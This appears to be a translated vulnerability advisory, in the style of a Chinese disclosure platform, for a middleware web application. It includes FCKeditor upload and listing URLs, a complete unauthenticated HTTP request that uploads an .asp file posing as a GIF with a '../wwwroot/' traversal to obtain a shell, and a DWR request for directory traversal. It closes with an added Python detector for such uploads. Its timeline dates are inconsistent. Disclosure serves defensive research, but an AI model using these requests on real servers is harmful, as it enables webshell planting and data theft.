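2015-10-27: Details reported to the vendor; awaiting vendor handling
2015-10-30: Vendor has confirmed; details disclosed to the vendor only
2015-11-02: Details opened to third-party security partners (绿盟科技 / NSFOCUS, 唐朝安全巡航 / TangScan)
2015-12-24: Details disclosed to core white hats and experts in related fields
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2015-12-17: Details disclosed to the public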
rt
Some versions use FCKeditor, which leads to getshell. Exploitation:
http://url/fckeditor/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector
Upload a file through the address above, then obtain the file path through the following address:
http://url/fckeditor/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
Cases:
**.**.**.**/**.**.**.**:8088/**.**.**.**:8080/**.**.**.**:8088/**.**.**.**:8888/**.**.**.**:81/**.**.**.**:8080/**.**.**.**:8088/**.**.**.**/**.**.**.**/**.**.**.**:8080/**.**.**.**/
Some versions also contain another getshell and an arbitrary file traversal. Unrestricted getshell (no login required):
POST /msciconupload.do HTTP/1.1
Host: url
Content-Length: 287
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryV9A09McP8VWpvqkH
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8

------WebKitFormBoundaryV9A09McP8VWpvqkH
Content-Disposition: form-data; name="file"; filename="test.asp"
Content-Type: image/gif

YY
------WebKitFormBoundaryV9A09McP8VWpvqkH
Content-Disposition: form-data; name="systag"

../wwwroot/
------WebKitFormBoundaryV9A09McP8VWpvqkH--
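A defender-side check for the upload request above, as an added example that is not part of the original report: it parses a multipart/form-data body and flags a script extension hidden behind an image content type and a traversal sequence in the `systag` field. The extension list, the function names and the sample body are assumptions constructed for illustration.

```python
import posixpath
from email import message_from_bytes
from email.policy import HTTP

# Extensions a web server may execute (assumption; extend for the deployed stack).
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".aspx", ".jsp", ".jspx", ".php"}

def inspect_upload(content_type, body):
    """Return a list of findings for one multipart/form-data body (empty = clean)."""
    # Prefix the request's Content-Type so the stdlib MIME parser can split the parts.
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    findings = []
    for part in message_from_bytes(raw, policy=HTTP).iter_parts():
        field = part.get_param("name", header="content-disposition")
        filename = part.get_filename()
        if filename is not None:
            ext = posixpath.splitext(filename.replace("\\", "/").lower())[1]
            if ext in SCRIPT_EXTS:
                findings.append(f"script extension {ext} in field {field!r}")
                if part.get_content_type().startswith("image/"):
                    findings.append("declared image type contradicts the extension")
        elif field == "systag":
            value = part.get_payload(decode=True).decode("utf-8", "replace").strip()
            # Reject any ".." path segment and any absolute path in the target directory.
            if ".." in value.replace("\\", "/").split("/") or value[:1] in ("/", "\\"):
                findings.append(f"path traversal in systag: {value!r}")
    return findings

# Constructed sample with the same shape as the request above (boundary shortened).
CT = "multipart/form-data; boundary=----SampleBoundary"

def build(filename, ctype, systag):
    """Build a constructed two-field body: the uploaded file and the systag directory."""
    lines = ["------SampleBoundary",
             f'Content-Disposition: form-data; name="file"; filename="{filename}"',
             f"Content-Type: {ctype}", "", "YY",
             "------SampleBoundary",
             'Content-Disposition: form-data; name="systag"', "", systag,
             "------SampleBoundary--", ""]
    return "\r\n".join(lines).encode("ascii")

if __name__ == "__main__":
    for finding in inspect_upload(CT, build("test.asp", "image/gif", "../wwwroot/")):
        print(finding)
```

The same two checks belong in the upload handler itself: resolve the destination under a fixed upload root and allowlist extensions server-side instead of trusting the client-supplied content type.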
After logging in to the middleware system, arbitrary file traversal is possible:
POST /dwr/call/plaincall/MdpConfig.getMdpConfigList.dwr HTTP/1.1
Host: **.**.**.**:8088
Content-Length: 253
Origin: **.**.**.**:8088
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
Content-Type: text/plain
Accept: */*
Referer: **.**.**.**:8088/mdp/mdp_config.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ZP_CAL=%27fdow%27%3Anull%2C%27history%27%3A%222015/10/01/01/13%22%2C%27sortOrder%27%3A%22asc%22%2C%27hsize%27%3A9; JSESSIONID=A4213A760A55F56CFF52A3517D549D6C

callCount=1
page=/mdp/mdp_config.jsp
httpSessionId=A4213A760A55F56CFF52A3517D549D6C
scriptSessionId=A314EC2EA7AD1E43DE29854FA7443FC5853
c0-scriptName=MdpConfig
c0-methodName=getMdpConfigList
c0-id=0
c0-param0=string:./
c0-param1=boolean:false
batchId=5
Traverse using the c0-param0 parameter. Cases:
**.**.**.**/**.**.**.**:8080/**.**.**.**:8088/
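Contact the vendor
Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-10-30 17:49
CNVD confirmed and reproduced the situation described, and CNVD has notified the organization that manages the website through the contact details published on the website.
None yet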